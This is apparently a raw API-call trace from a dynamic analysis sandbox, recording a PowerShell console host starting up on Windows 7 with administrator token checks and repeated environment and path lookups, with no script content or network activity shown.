	[0337.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0337.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xad860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0337.456] SetErrorMode (uMode=0x1) returned 0x1
	[0337.456] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xadae0 | out: lpFileInformation=0xadae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0337.456] SetErrorMode (uMode=0x1) returned 0x1
	[0339.281] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.281] CoTaskMemFree (pv=0x1b8da0) 
	[0339.283] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.283] CoTaskMemFree (pv=0x1b8da0) 
	[0339.283] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.283] CoTaskMemFree (pv=0x1b8da0) 
	[0339.286] CoCreateGuid (in: pguid=0xadea8 | out: pguid=0xadea8*(Data1=0x88fbe1b, Data2=0xa5b, Data3=0x4624, Data4=([0]=0x9b, [1]=0x44, [2]=0x65, [3]=0x68, [4]=0x2a, [5]=0x2, [6]=0x7c, [7]=0xa3))) returned 0x0
	[0339.290] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.290] CoTaskMemFree (pv=0x1b8da0) 
	[0339.293] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.293] CoTaskMemFree (pv=0x1b8da0) 
	[0339.296] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0339.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.296] CoTaskMemFree (pv=0x1b8da0) 
	[0339.303] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0339.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xadb50 | out: lpConsoleScreenBufferInfo=0xadb50) returned 1
	[0339.640] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0339.640] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xadb50 | out: lpConsoleScreenBufferInfo=0xadb50) returned 1
	[0339.642] GetVersionExW (in: lpVersionInformation=0xadae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xadae0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0339.645] GetCurrentProcess () returned 0xffffffffffffffff
	[0339.646] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xadb78 | out: TokenHandle=0xadb78*=0x318) returned 1
	[0339.650] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xada98 | out: TokenInformation=0x0, ReturnLength=0xada98) returned 0
	[0339.651] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c7290
	[0339.652] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x1c7290, TokenInformationLength=0x4, ReturnLength=0xada98 | out: TokenInformation=0x1c7290, ReturnLength=0xada98) returned 1
	[0339.653] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xadbf8 | out: phNewToken=0xadbf8*=0x314) returned 1
	[0339.653] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xada98 | out: TokenInformation=0x0, ReturnLength=0xada98) returned 0
	[0339.654] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1c72c0
	[0339.654] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x1c72c0, TokenInformationLength=0x4, ReturnLength=0xada98 | out: TokenInformation=0x1c72c0, ReturnLength=0xada98) returned 1
	[0339.655] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2dffa90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xadc08 | out: IsMember=0xadc08) returned 1
	[0339.655] CloseHandle (hObject=0x314) returned 1
	[0339.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0339.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.581] CoTaskMemAlloc (cb=0x804) returned 0x1b89f880
	[0340.581] GetConsoleTitleW (in: lpConsoleTitle=0x1b89f880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0340.581] CoTaskMemFree (pv=0x1b89f880) 
	[0340.595] CoTaskMemAlloc (cb=0x804) returned 0x1b8a0130
	[0340.595] GetConsoleTitleW (in: lpConsoleTitle=0x1b8a0130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0340.595] CoTaskMemFree (pv=0x1b8a0130) 
	[0340.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0340.597] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0341.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0341.857] SetConsoleCtrlHandler (HandlerRoutine=0x29868dc, Add=1) returned 1
	[0342.313] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0342.316] CoCreateGuid (in: pguid=0xadcf0 | out: pguid=0xadcf0*(Data1=0xe0f3ff10, Data2=0xf589, Data3=0x4ffa, Data4=([0]=0x95, [1]=0xf, [2]=0x3b, [3]=0x66, [4]=0x9f, [5]=0x98, [6]=0x15, [7]=0x45))) returned 0x0
	[0342.316] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.317] CoTaskMemFree (pv=0x1b8da0) 
	[0342.320] WinSqmIsOptedIn () returned 0x0
	[0342.320] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.321] CoTaskMemFree (pv=0x1b8da0) 
	[0342.321] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.322] CoTaskMemFree (pv=0x1b8da0) 
	[0342.322] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.322] CoTaskMemFree (pv=0x1b8da0) 
	[0342.323] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.323] CoTaskMemFree (pv=0x1b8da0) 
	[0342.324] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.324] CoTaskMemFree (pv=0x1b8da0) 
	[0342.325] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.326] CoTaskMemFree (pv=0x1b8da0) 
	[0342.326] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.326] CoTaskMemFree (pv=0x1b8da0) 
	[0342.327] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.327] CoTaskMemFree (pv=0x1b8da0) 
	[0342.329] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.329] CoTaskMemFree (pv=0x1b8da0) 
	[0342.651] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.651] CoTaskMemFree (pv=0x1b8da0) 
	[0342.651] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.651] CoTaskMemFree (pv=0x1b8da0) 
	[0342.652] CoTaskMemAlloc (cb=0x104) returned 0x1b8da0
	[0342.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.652] CoTaskMemFree (pv=0x1b8da0) 
	[0343.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0343.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0344.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
